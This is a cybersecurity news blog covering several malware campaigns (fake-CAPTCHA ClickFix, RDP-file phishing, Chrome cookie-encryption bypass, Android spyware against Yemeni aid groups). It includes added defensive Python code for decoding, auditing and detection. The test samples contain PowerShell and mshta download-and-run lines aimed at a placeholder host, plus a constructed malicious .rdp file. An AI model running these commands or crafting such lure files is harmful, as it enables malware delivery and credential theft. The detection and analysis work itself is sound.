Posts labelled Malicious Campaign

Malware Campaign Expands Its Use of Fraudulent CAPTCHAs

 

Attackers are increasingly spreading malware using an unusual method: a fake CAPTCHA as the initial infection vector. Researchers from several companies reported on the campaign in August and September 2024. The attackers initially targeted gamers, delivering the Lumma stealer through websites offering cracked games.

Kaspersky's more recent research into the ad network shows that the malicious CAPTCHA now spreads through a wide range of online resources unrelated to gaming: adult sites, file-sharing services, betting platforms, anime resources, and web apps that monetise traffic. The distribution network is clearly being expanded to reach a larger pool of victims. The researchers also found that the CAPTCHA delivers both Lumma and the Amadey Trojan.

Malicious CAPTCHA

Understanding how the attackers and their distribution network operate is the best way to avoid falling for the trick. The ad network that pushes pages with the malicious CAPTCHA also carries legitimate, non-malicious offers.

It works as follows: when the user clicks anywhere on a page that carries the ad module, they are redirected to other resources. As is common with adware, most redirects lead to websites advertising security software, ad blockers and similar products. Sometimes, though, the victim lands on a page containing the malicious CAPTCHA.

Unlike genuine CAPTCHAs, which are meant to protect websites from bots, this copycat promotes dubious resources. As in the previous stage, the victim does not always encounter malware: on one site, for example, the CAPTCHA invites the visitor to scan a QR code that leads to a betting site.

The Trojans are distributed by CAPTCHAs that give the victim instructions. Clicking the "I'm not a robot" button copies the line powershell.exe -eC bQBzAGgAdABhA <...>MAIgA= to the clipboard (-eC is an abbreviation of -EncodedCommand, which takes a Base64-encoded UTF-16LE script, so nothing readable is shown to the user) and displays the following "verification steps":

  • Press Win + R to open the Run dialogue box.
  • Paste the clipboard contents into the text field with Ctrl + V.
  • Press Enter to execute the command.
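Because -EncodedCommand is just Base64 over UTF-16LE text, a line planted on the clipboard can be decoded offline before anyone runs it. The following is an added example, not code from the original post or from Kaspersky: it recognises the powershell.exe -eC form, decodes the argument (tolerating a truncated sample, as the visible prefix bQBzAGgAdABhA is), and flags download-and-execute markers in the result. The full payload it decodes is constructed here with a hypothetical host; only the prefix comes from the text above.

```python
# Added example, not code from the original post: triage a clipboard line of the
# form "powershell.exe -eC <Base64>" as planted by the fake-CAPTCHA page.
# -EncodedCommand carries the script as Base64 of UTF-16LE text, so the line can
# be decoded offline before anyone runs it. Only the prefix "bQBzAGgAdABhA" is
# visible in the original text; the full payload used below is constructed.
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...)
ENCODED_CMD_RE = re.compile(
    r"powershell(?:\.exe)?\s+(?:-\S+\s+)*-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

# Decoded fragments that mark the one-liner as a download-and-execute cradle
CRADLE_MARKERS = ("mshta", "iex", "invoke-expression", "downloadstring",
                  "invoke-webrequest", "iwr", "frombase64string", "curl")


def decode_encoded_command(b64: str) -> str:
    """Decode a (possibly truncated) -EncodedCommand argument to the script text."""
    if len(b64) % 4 == 1:
        # A lone trailing character holds only the top six bits of one more byte.
        # Assume the missing two bits are zero, which is exact for the 0x00 high
        # byte of UTF-16LE ASCII, so that partial byte is still recovered.
        b64 += "A"
    b64 += "=" * (-len(b64) % 4)
    raw = base64.b64decode(b64)
    raw = raw[: len(raw) - (len(raw) % 2)]  # drop an unpaired trailing byte
    return raw.decode("utf-16-le", errors="replace")


def triage_clipboard(line: str) -> dict:
    """Report whether the line is an encoded PowerShell command, what it decodes
    to, and which cradle markers the decoded script contains."""
    m = ENCODED_CMD_RE.search(line)
    if not m:
        return {"encoded": False, "script": None, "markers": []}
    script = decode_encoded_command(m.group(1))
    low = script.lower()
    return {"encoded": True, "script": script,
            "markers": [k for k in CRADLE_MARKERS if k in low]}


def make_sample(script: str) -> str:
    """Build a clipboard line the same way the malicious page does (for testing)."""
    b64 = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -eC {b64}"


if __name__ == "__main__":
    # Constructed payload pointing at a hypothetical host, not an observed URL
    sample = make_sample("mshta https://lure.example/verify.mp4")
    print(triage_clipboard(sample))
    # The visible prefix from the original text decodes to the start of the script
    print(decode_encoded_command("bQBzAGgAdABhA"))
```

Decoding the visible prefix alone already yields "mshta", which is the check a practitioner would make before touching the Run dialogue: the command is not a verification step but a launcher for a remote HTA.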

Payload: Amadey trojan

The researchers found that the same campaign also distributes the Amadey Trojan, which has featured in security reports since 2018. In short, the Trojan downloads several modules that steal credentials from popular browsers and Virtual Network Computing (VNC) clients.

It also detects cryptocurrency wallet addresses in the clipboard and replaces them with addresses owned by the attackers. One module can also capture screenshots. In some cases, Amadey downloads the Remcos remote access tool to the victim's device, giving the attackers complete control over it.

Between September 22 and October 14, 2024, over 140,000 users encountered the ad scripts. According to Kaspersky's telemetry, more than 20,000 of those users were redirected to infected sites, where some met a fake update notification or a fake CAPTCHA. Users in Brazil, Spain, Italy and Russia were the most frequently affected.

Microsoft Warns of Russian Spear-Phishing Campaign Targeting Multiple Organizations

 

Microsoft Threat Intelligence has discovered a new attack campaign by the Russian hacker group Midnight Blizzard, aimed at thousands of users from over 100 organisations. The attack uses spear-phishing emails carrying RDP configuration files which, when opened, connect the victim's machine to an attacker-controlled server and expose it to compromise.

The campaign targeted thousands of users in higher education, defence, non-governmental organisations and government institutions. Dozens of countries have been affected, mainly in the United Kingdom, Europe, Australia and Japan, consistent with previous Midnight Blizzard phishing operations.

In this latest campaign, victims received carefully targeted emails with social engineering lures referencing Microsoft, Amazon Web Services and the concept of Zero Trust.

According to Microsoft Threat Intelligence, the emails were sent from addresses belonging to legitimate organisations that the threat actor had compromised in earlier breaches. Every email carried an RDP configuration (.rdp) file signed with a free Let's Encrypt certificate and containing multiple sensitive parameters. When the user opened the file, an outbound RDP connection was established to an attacker-controlled system.

Because the victim's machine is the RDP client and the file enables resource redirection, the attacker's server gains access to the victim's local resources. The threat actor could then use the established RDP connection to gather information about the targeted device: files and folders, mapped network drives, and peripherals such as printers, microphones and smart cards.

It would also allow the collection of clipboard data, web authentication through Windows Hello, passkeys and security keys, and even point-of-sale devices. Such a connection could also let the threat actor install malware on the targeted device or on mapped network shares.

The outbound RDP connections went to domains crafted to look like AWS domains. Amazon, which is working with Ukraine's CERT-UA to counter the threat, immediately began seizing the affected domains to disrupt the operation. Microsoft, meanwhile, notified all affected customers who had been targeted or compromised.
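An .rdp file is plain text in name:type:value form, so the settings described above can be checked before the file is ever opened. The following is an added example, not code from Microsoft or the report: it parses a file, lists the redirections that expose the victim's resources to the remote host, notes whether the file is signed and auto-connects, and flags it when anything is redirected to a host outside an allowlist. The sample file and host names are constructed for illustration; the setting names themselves are the real ones mstsc.exe reads.

```python
# Added example, not from the Microsoft report: parse an .rdp file and list the
# settings that hand the victim's own resources to the remote server. When a
# user opens such a file, their machine is the RDP client, so every enabled
# redirection is exposed to whoever runs the server named in "full address".
# The file content below is constructed; the host names are hypothetical.
from typing import Dict, List

# Integer settings (value 1 = on) that redirect a local resource to the server
REDIRECT_FLAGS = {
    "redirectclipboard": "clipboard",
    "redirectprinters": "printers",
    "redirectsmartcards": "smart cards",
    "redirectposdevices": "point-of-sale devices",
    "redirectwebauthn": "WebAuthn (Windows Hello, passkeys, security keys)",
    "redirectdrives": "local drives",
    "audiocapturemode": "microphone",
}
# String settings where any non-empty value ("*" = everything) enables redirection
REDIRECT_LISTS = {
    "drivestoredirect": "local drives",
    "devicestoredirect": "plug-and-play devices",
}


def parse_rdp(text: str) -> Dict[str, str]:
    """Parse 'name:type:value' lines; type is s (string), i (integer) or b (binary)."""
    settings: Dict[str, str] = {}
    for line in text.splitlines():
        if line.count(":") < 2:
            continue
        name, _kind, value = line.split(":", 2)
        settings[name.strip().lower()] = value.strip()
    return settings


def redirections(settings: Dict[str, str]) -> List[str]:
    """Local resources the file exposes to the remote host (deduplicated, in order)."""
    found: List[str] = []
    for key, label in REDIRECT_FLAGS.items():
        if settings.get(key) == "1" and label not in found:
            found.append(label)
    for key, label in REDIRECT_LISTS.items():
        if settings.get(key) and label not in found:
            found.append(label)
    return found


def assess(text: str) -> dict:
    s = parse_rdp(text)
    return {
        "host": s.get("full address", ""),
        # A signature only says who published the file; it says nothing about the host.
        "signed": bool(s.get("signature")),
        "auto_connect": s.get("prompt for credentials") == "0",
        "redirections": redirections(s),
    }


def is_suspicious(text: str, trusted_hosts: set) -> bool:
    """Flag a file that redirects anything to a host outside the allowlist."""
    r = assess(text)
    hostname = r["host"].split(":")[0].lower()
    return bool(r["redirections"]) and hostname not in trusted_hosts


# Constructed sample in the style described in the report: AWS-looking host,
# every redirection enabled, signed (placeholder value) so mstsc shows fewer warnings.
SAMPLE_RDP = """\
full address:s:aws-sso-gateway.example:3389
redirectclipboard:i:1
redirectprinters:i:1
redirectsmartcards:i:1
redirectposdevices:i:1
redirectwebauthn:i:1
audiocapturemode:i:1
drivestoredirect:s:*
devicestoredirect:s:*
prompt for credentials:i:0
signature:s:CONSTRUCTED-PLACEHOLDER
"""

if __name__ == "__main__":
    print(assess(SAMPLE_RDP))
    print(is_suspicious(SAMPLE_RDP, {"rdp.corp.example"}))
```

The signature check is deliberately informational only: a valid signature from a publicly trusted certificate suppresses the "unknown publisher" prompt, which is exactly why the attackers bothered to sign the files, but it says nothing about where the connection goes. Blocking outbound TCP/3389 to the internet at the perimeter stops this class of lure regardless of what the file contains.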

New Tool Circumvents Google Chrome's New Cookie Encryption System

 

A researcher has published a tool that bypasses Google's new App-Bound encryption, a defence against cookie theft, and extracts saved data from the Chrome browser.

Security researcher Alexander Hagenah published the tool, 'Chrome-App-Bound-Encryption-Decryption', after noticing that others had already found equivalent bypasses.

Although the tool only does what several infostealer operations already do with their malware, its public availability raises the risk for Chrome users who keep sensitive information in the browser.

Google introduced Application-Bound (App-Bound) encryption in July 2024 with Chrome 127. The feature encrypts cookies with a key that only a Windows service running with SYSTEM privileges will release, and that service checks that the caller is Chrome before doing so.

The goal was to protect this data from infostealer malware, which typically runs with the logged-in user's privileges: without SYSTEM privileges such malware can no longer decrypt stolen cookies, and trying to obtain those privileges risks triggering security software.

"Because the App-Bound service is running with system privileges, attackers need to do more than just coax a user into running a malicious app," noted Google in July. "Now, the malware has to gain system privileges, or inject code into Chrome, something that legitimate software shouldn't be doing.” 

However, by September several infostealer developers had found ways around the new protection, allowing their cybercriminal customers to once again siphon and decrypt sensitive data from Chrome.

Google had previously said that a "cat and mouse" game between infostealer developers and its engineers was to be expected and that it never assumed the defence would be impenetrable. Rather, App-Bound encryption was meant to lay the groundwork for a progressively stronger system. Google's response at the time:

"We are aware of the disruption that this new defense has caused to the infostealer landscape and, as we stated in the blog, we expect this protection to cause a shift in attacker behavior to more observable techniques such as injection or memory scraping. This matches the new behavior we have seen. 

We continue to work with OS and AV vendors to try and more reliably detect these new types of attacks, as well as continuing to iterate on hardening defenses to improve protection against infostealers for our users.”

Microsoft Issues New Warnings For Windows Users

 

A new warning has been issued about a "global attack" targeting Windows users in multiple countries. The campaign is surprisingly basic, but it highlights the risk to the hundreds of millions of Windows 10 users who will be without security updates in a year.

Palo Alto Networks' Unit 42 warned about the risks of fake CAPTCHAs last month. The warning received little attention at the time, but a video by researcher John Hammond on X helped spread the word. McAfee researchers have now released a fresh alert about these fraudulent CAPTCHA pop-ups, which are currently circulating.

These attacks should be easy to spot, but they are designed to be casually effective. The fake challenges deliver Lumma Stealer. "These pages have a button that, when clicked, shows instructions for victims to paste PowerShell script into a Run window. This copy/paste PowerShell script retrieves and runs a Windows EXE for Lumma Stealer malware. The associated Lumma Stealer EXE files retrieve and use zip archives that don't appear to be inherently malicious on their own," researchers explained. McAfee, in its latest research, cautions that the ClickFix infection chain works by tricking people into clicking buttons like 'Verify you are a human' or 'I am not a robot'.

When the button is clicked, a malicious script is copied to the user's clipboard. Users are then tricked into pressing Windows key + R and pasting the script, unknowingly launching the malware. This technique shortens the infection chain: no exploit and no downloaded file are needed, because the victim runs the first stage themselves.
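The chain has one stable property a defender can key on: the Run dialogue is part of explorer.exe, so a pasted one-liner appears in process telemetry as explorer.exe directly spawning a script interpreter with an encoded or download-and-run command line, with no browser or Office parent in between. The following detection logic is an added example, not code from Unit 42 or McAfee. It runs over constructed events shaped like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the paths, PIDs and the hypothetical lure.example host are illustrative.

```python
# Added example, not from Unit 42 or McAfee: detection logic for the ClickFix
# chain over process-creation events. The Run dialog belongs to explorer.exe,
# so a pasted one-liner shows up as explorer.exe directly spawning a script
# interpreter with an encoded or download-and-run command line. The events are
# constructed samples shaped like Sysmon Event ID 1 fields; paths are illustrative.
import re
from typing import Dict, List

INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Command-line traits of the pasted one-liner
INDICATORS = {
    "encoded_command": re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_window": re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I),
    "download_cradle": re.compile(
        r"(?:iwr\s|invoke-webrequest|downloadstring|downloadfile|curl\s|mshta(?:\.exe)?\s+https?://)",
        re.I),
}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].strip('"').lower()


def classify(event: Dict[str, str]) -> dict:
    """Score one process-creation event for the ClickFix pattern."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    # explorer.exe -> interpreter is what a Run-dialog launch looks like
    from_run_dialog = parent == "explorer.exe" and image in INTERPRETERS
    return {"pid": event.get("ProcessId"), "from_run_dialog": from_run_dialog,
            "indicators": hits, "alert": from_run_dialog and bool(hits)}


def alerts(events: List[Dict[str, str]]) -> List[dict]:
    return [c for c in map(classify, events) if c["alert"]]


SAMPLE_EVENTS = [
    # 1. The ClickFix paste: Run dialog -> hidden, encoded PowerShell
    #    (the Base64 is constructed and decodes to the start of "mshta https://")
    {"ProcessId": "4412", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAA=="},
    # 2. An admin opening a console from the Run dialog: no suspicious arguments
    {"ProcessId": "4420", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe"},
    # 3. Download cradle spawned by a browser: suspicious, but a different chain
    {"ProcessId": "4431", "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -c \"iwr https://lure.example/a.ps1 | iex\""},
    # 4. The decoded stage of the paste: mshta fetching a remote HTA
    {"ProcessId": "4450", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe https://lure.example/verify.mp4"},
]

if __name__ == "__main__":
    for a in alerts(SAMPLE_EVENTS):
        print(a)
```

Event 3 is kept in the sample on purpose: it carries a download cradle but is not a Run-dialogue launch, so the rule leaves it to a separate browser-spawns-PowerShell detection rather than lumping every encoded command into one alert. On the forensic side, whatever was typed into Run also persists in the user's RunMRU registry key, which is where the pasted line can be recovered after the fact.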

The pattern is clear: the infostealer installed on your device is after your crypto wallets and account credentials. Nothing about this looks like a normal CAPTCHA, even though the lures are evolving and getting harder to spot. If being asked to copy, paste and run something at that point doesn't make you uneasy, step away from the computer and take a break.

McAfee also identifies two cleverly crafted lures: one aimed at users looking to download pirated games, the other at software developers worried about a security flaw in code they have written and published.

Users searching for pirated games should have their guard up anyway, yet the team warns that "they may encounter online forums, community posts, or public repositories that redirect them to malicious links."

The second lure is sneakier. Phishing emails, often aimed at GitHub contributors, urge them to fix a fake security flaw and link to the same fraudulent CAPTCHA pages.

This fake CAPTCHA campaign is spreading; be cautious and take a moment to look for signs of compromise when you meet one. It won't always be as obvious as in this instance, and these attacks will evolve and become harder to identify. Above all, never copy, paste and run anything a CAPTCHA tells you to.

This is another timely reminder for Windows 10 users that staying on an unsupported operating system should not be among their plans between now and October next year. If Microsoft doesn't offer reasonably priced extended-support options and workarounds aren't enough to close the gap, you'll need to switch to Windows 11.

BT Uncovers 2,000 Potential Cyberattacks Signals Every Second

 

BT logs 2,000 potential cyber attack signals per second, according to the latest data from the telecoms giant, which warns of a rising threat from cyber criminals.

The firm found that internet-connected devices were each being scanned more than 1,000 times a day by known malicious sources looking for vulnerabilities in online systems. While some scanning is legitimate security monitoring, BT said 78% of it was not harmless.

BT said its latest data showed a 1,234% rise in new malicious scanners across its networks over the past year, and suggested the increase could be due to more malicious actors using AI-powered, automated bots to scan for vulnerabilities while evading tools designed to detect suspicious activity.

The UK's National Cyber Security Centre (NCSC) had previously warned that AI tools were upskilling malicious actors and lowering the barrier to entry for launching cyber attacks.

According to BT's research, the IT, defence and financial services sectors were the most targeted, but other sectors such as retail, education and hospitality are increasingly targeted because they are perceived to have a weaker security focus. The data was released during BT's Secure Tomorrow cybersecurity festival at the company's Adastral Park research facility in Suffolk.

“Today, every business is a digital business, and our data shows that every 90 seconds hackers are checking connected devices to find a way in – like opportunistic burglars looking for an open window,” Tris Morgan, managing director for security at BT, stated. 

“Tools like AI provide new routes of attack, but they can also be the first line of defence. At BT, we’re constantly evolving our network security to stay one step ahead and protect more than a million businesses, day in, day out.”

The warning comes after the government announced that UK data centres will be designated Critical National Infrastructure (CNI), putting them on a par with energy, water and emergency services and giving them more government support and protection against cyber attacks, IT outages and environmental disasters.

Pro-Houthi Group Deploys Android Spyware to Target Yemeni Humanitarian Orgs

 

Research by Recorded Future's Insikt Group shows that OilAlpha, a suspected pro-Houthi group, continues to target humanitarian and human rights organisations in Yemen. The group deploys malicious Android applications to steal credentials and gather intelligence, potentially giving it influence over aid distribution.

Affected organisations include CARE International and the Norwegian Refugee Council. The report describes the continuing threat and recommends mitigations such as social engineering awareness training, strong passwords and multi-factor authentication.

Insikt Group published its first report on OilAlpha in May 2023, describing a pro-Houthi group targeting humanitarian organisations in Yemen with malicious Android apps. A year later, new findings show OilAlpha is still active and remains a serious threat to humanitarian work in the region.

The new report identifies a fresh set of malicious mobile apps and infrastructure linked to OilAlpha. The apps target employees of internationally known humanitarian organisations such as Saudi Arabia's King Salman Humanitarian Aid and Relief Centre, the Norwegian Refugee Council and CARE International.

Last month researchers found a malicious Android file named "Cash Incentives.apk" tied to OilAlpha's infrastructure. The app requests invasive permissions, including access to the camera, audio recording, SMS and contacts, a combination that classifies it as a remote access trojan (RAT). Further investigation found two more malicious apps targeting the Norwegian Refugee Council and CARE International, all of them attempting to steal credentials and gather sensitive information.
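The permission set is what gives such an app away: a "cash incentives" lure has no reason to read SMS and contacts, let alone record audio. The following is an added example, not code from Insikt Group, that reads the uses-permission entries from an Android manifest and decides whether the combination matches the surveillance profile described above. The two manifests are constructed, and the package names are hypothetical; with a real APK the same list comes out of aapt dump permissions or from the decoded manifest.

```python
# Added example, not from the Insikt Group report: triage the permissions an
# Android app requests and decide whether the combination matches the
# surveillance profile described (camera, audio, SMS, contacts). The manifests
# below are constructed; the package names are hypothetical.
import xml.etree.ElementTree as ET
from typing import Dict, List, Set

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permission -> the kind of data or sensor it unlocks
SURVEILLANCE: Dict[str, str] = {
    "android.permission.CAMERA": "camera",
    "android.permission.RECORD_AUDIO": "microphone",
    "android.permission.READ_SMS": "SMS",
    "android.permission.RECEIVE_SMS": "SMS",
    "android.permission.READ_CONTACTS": "contacts",
    "android.permission.READ_CALL_LOG": "call log",
    "android.permission.ACCESS_FINE_LOCATION": "location",
}
# Permissions that help an app persist or phish rather than grab a sensor
ABUSE_PRONE: Set[str] = {
    "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.REQUEST_INSTALL_PACKAGES",
}
RAT_THRESHOLD = 3  # distinct surveillance capabilities before we call it RAT-like


def requested_permissions(manifest_xml: str) -> List[str]:
    root = ET.fromstring(manifest_xml)
    return [el.get(ANDROID_NS + "name", "") for el in root.iter("uses-permission")]


def assess(manifest_xml: str) -> dict:
    perms = requested_permissions(manifest_xml)
    capabilities = sorted({SURVEILLANCE[p] for p in perms if p in SURVEILLANCE})
    abuse = sorted(p for p in perms if p in ABUSE_PRONE)
    return {
        "permissions": len(perms),
        "capabilities": capabilities,
        "abuse_prone": abuse,
        "rat_like": len(capabilities) >= RAT_THRESHOLD,
    }


# Constructed manifest for a "cash incentives" lure app
LURE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.cashincentives">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.CAMERA"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <application android:label="Cash Incentives"/>
</manifest>
"""

# Constructed manifest for an ordinary network-only app, for comparison
BENIGN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.newsreader">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
</manifest>
"""

if __name__ == "__main__":
    print(assess(LURE_MANIFEST))
    print(assess(BENIGN_MANIFEST))
```

The threshold is a heuristic, not a verdict: a messaging app legitimately needs SMS and contacts, so the useful question is whether the requested sensors match what the app claims to do. Sideloaded APKs distributed through chat messages, as in this campaign, bypass the store review that would otherwise ask that question.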

OilAlpha also runs a credential theft portal on the domain kssnew[.]online. The page impersonates humanitarian organisations' login pages, prompting users to enter credentials that are then captured by the attackers.

To address this, organisations should put information security policies in place and run social engineering and anti-phishing awareness training. Strong passwords and multi-factor authentication (MFA) dramatically reduce the likelihood of credential theft, with phishing-resistant methods such as FIDO2 security keys preferable, since a fake login page can relay a one-time code as easily as a password. Users should also be cautious with direct messages on social media and encrypted messaging apps, and verify the legitimacy of messages whenever possible.

OilAlpha's operations point to a persistent effort to influence humanitarian relief distribution in Yemen. The group's focus on humanitarian organisations is expected to continue, possibly spreading outside Yemen.

Defending Hospitals and Clinics: Strategies Against Ransomware

The healthcare industry has become a prime target for ransomware attacks in recent years. These malicious campaigns exploit vulnerabilities in healthcare systems, disrupt critical services, and compromise sensitive patient data. 

According to Steve Stone, president of Rubrik's Zero Labs, ransomware is one of the levers changing how enterprises think about risk. Zero Labs' latest analysis shows that healthcare firms are more likely than other sectors to lose 20% of their sensitive data after a ransomware attack.

This blog post will explore why healthcare organizations are at risk and discuss strategies to mitigate these threats.

1. Data Sensitivity and Volume

Healthcare organizations handle vast amounts of sensitive data, including patient records, medical histories and financial information. This data is a goldmine for cybercriminals seeking financial gain; according to recent reports, healthcare data breaches cost organizations an average of $7.13 million per incident. The sheer volume of sensitive data makes healthcare an attractive target.

2. Architectural Similarities

While ransomware operators don't focus exclusively on healthcare, the industry shares architectural characteristics with other targeted sectors. For instance:

Legacy Systems: Many healthcare institutions still rely on legacy systems that lack robust security features. These outdated systems are more susceptible to attacks.

Interconnected Networks: Healthcare networks connect various entities—hospitals, clinics, laboratories, and insurance providers. This interconnectedness creates multiple entry points for attackers.

Medical Devices: Networked medical devices such as MRI machines and infusion pumps are integral to patient care. However, they often lack proper security controls and cannot be patched on a normal schedule, which makes them vulnerable.

3. Risk Surface Area

Preventing ransomware starts with understanding your risk surface area. Here’s how healthcare organizations can reduce their exposure:

Identity Management: Properly managing user identities and access rights is crucial. Limiting access to sensitive data according to roles and responsibilities prevents unauthorized access and changes, and limits how far a single compromised account can reach.

Data Visibility: Organizations must know where sensitive data resides, both on-premises and in the cloud. Regular audits and data classification are essential.

Backup and Recovery: Robust backup solutions are critical. Regular backups, kept isolated from the production network so that ransomware cannot encrypt them too, and tested restores ensure that organizations can recover systems without paying the ransom.

4. Incident Response Challenges

Healthcare organizations face unique challenges in incident response:

Hybrid Environments: Many healthcare systems operate in hybrid environments—partly on-premises and partly in the cloud. Coordinating incident response across these environments can be complex.

Patient Safety: Ransomware attacks can disrupt critical services, affecting patient care. Balancing data protection with patient safety is a delicate task.

Collaboration: Effective incident response requires collaboration among IT teams, legal departments, and external cybersecurity experts.

Hackers Reveal Their Strategy of Stealing Snowflake's Ticketmaster Data

 

A ShinyHunters hacker reportedly gained access to the Snowflake accounts of Ticketmaster and other organisations through a breach of software engineering firm EPAM Systems, Wired reported, supporting a Mandiant report that attributed some of the intrusions to compromised third-party contractors.

According to the hacker, infostealer malware and a remote access trojan deployed on the computer of an EPAM employee in Ukraine gave ShinyHunters access to unencrypted credentials the employee used to reach the firm's customers' Snowflake accounts. Those credentials were then used to break into the accounts, including Ticketmaster's.

EPAM denied the hacker's claims, but independent security researcher "Reddington" found an infostealer-harvested data dump online containing the internal EPAM URL for Ticketmaster's Snowflake account and the credentials the EPAM employee used to access it.

"This means that anyone that knew the correct URL to [Ticketmaster's] Snowflake could have simply looked up the password, logged in, and stolen the data," noted Reddington.

In the campaign against Snowflake customers, about 165 customer accounts were potentially compromised, but only a few have been identified so far. As Reddington's comment makes plain, the common factor is that a stolen password alone was enough to log in: MFA and network policies restricting where the account may be used from would have blocked the replayed credentials. Besides Ticketmaster, the banking group Santander has acknowledged that its data was stolen but has not named the account it was taken from.

A local media outlet has, however, confirmed that it was a Snowflake account. According to a post by the hackers, the stolen data included bank account information for 30 million customers, including 6 million account numbers and balances, 28 million credit card numbers, and human resources information about employees. LendingTree and Advance Auto Parts have also confirmed they may be victims of the campaign.

In an alert published earlier this week, the US Cybersecurity and Infrastructure Security Agency (CISA) urged organisations to follow Snowflake's recommendations to hunt for signs of unusual activity and take steps to prevent unauthorised access. A similar advisory from the Australian Signals Directorate's Australian Cyber Security Centre (ACSC) warned of "successful compromises of several companies using Snowflake environments".

Fraudulent Browser Updates Are Propagating BitRAT and Lumma Stealer Malware

 

Fake web browser updates are being used to spread remote access trojans (RATs) and information stealer malware like BitRAT and Lumma Stealer (aka LummaC2). 

"Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware," cybersecurity company eSentire stated in a recent report. "In April 2024, we observed FakeBat being distributed via similar fake update mechanisms."

The attack chain begins when potential targets visit a website carrying JavaScript that redirects them to a fraudulent browser update page ("chatgpt-app[.]cloud"). That page includes a download link for a ZIP archive ("Update.zip") hosted on Discord, which is downloaded to the victim's device automatically.

It's worth noting that threat actors frequently use Discord as a hosting and delivery channel: a recent Bitdefender study found more than 50,000 unsecured links spreading malware, phishing campaigns and spam over the past six months.

The ZIP archive contains another JavaScript file ("Update.js"), which runs PowerShell scripts that download further payloads, including BitRAT and Lumma Stealer, from a remote server disguised as PNG image files.

The same method retrieves PowerShell scripts for persistence and a .NET-based loader that is typically used to launch the final-stage malware. According to eSentire, the loader is most likely offered as a "malware delivery service", since it is used to spread both BitRAT and Lumma Stealer.

BitRAT is a feature-rich RAT that lets attackers harvest data, mine cryptocurrency, download additional malware and remotely control infected systems. Lumma Stealer, a commodity stealer sold for $250 to $1,000 per month since August 2022, can steal data from web browsers, cryptocurrency wallets and other sensitive sources.

"The fake browser update lure has become common amongst attackers as a means of entry to a device or network," the company noted, adding it "displays the operator's ability to leverage trusted names to maximize reach and impact.”

While such attacks typically rely on drive-by downloads and malvertising, ReliaQuest reported last week that it had identified a new variant of the ClearFake campaign that tricks users into copying, pasting and manually executing malicious PowerShell code under the guise of a browser update.

Specifically, the malicious website claims that "something went wrong while displaying this webpage" and instructs the visitor to install a root certificate to fix it, following a series of steps that include copying and pasting obfuscated PowerShell code into a PowerShell terminal.

"Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing 'LummaC2' malware," the company added.

Hackers Employ Malicious PDF Files To Kickstart Infection Chain

 

Europeans are renowned for their appreciation of fine wine, and the attackers behind a recent campaign exploited exactly that. By luring European Union (EU) diplomats with a fake wine-tasting event, the operation aimed to deliver a novel backdoor.

In a blog post published on February 27, researchers at Zscaler ThreatLabz reported finding the campaign, which specifically targeted officials from EU countries with diplomatic missions in India. The actor, dubbed "SpikedWine", attached a PDF to emails posing as an invitation letter from India's embassy, inviting diplomats to a wine-tasting event on February 2.

"We believe that a nation-state threat actor, interested in exploiting the geopolitical relations between India and diplomats in European nations, carried out this attack," Zscaler ThreatLabz researchers Sudeep Singh and Roy Tay explained in the post.

The campaign's payload is a backdoor called "WineLoader", which has a modular design and uses techniques to avoid detection. These include re-encrypting and zeroing out memory buffers, which protects sensitive data in memory and frustrates memory forensics tools, the researchers said.

SpikedWine used compromised websites for command-and-control (C2) at different stages of the attack chain, which begins when a victim clicks a link in the PDF and ends with the modular delivery of WineLoader. Overall, the attackers showed a high degree of skill, both in the creative design of the social engineering and in the delivery of the malware.

Zscaler ThreatLabz found the PDF file after it was uploaded to VirusTotal from Latvia on January 30. The attackers carefully crafted the content to imitate India's ambassador, and the invitation contains a malicious link to a fake questionnaire that must be completed in order to attend.

Clicking the link takes the user to a compromised site that serves a ZIP archive containing a file named "wine.hta". The HTA file contains obfuscated JavaScript that triggers the next stage of the attack.

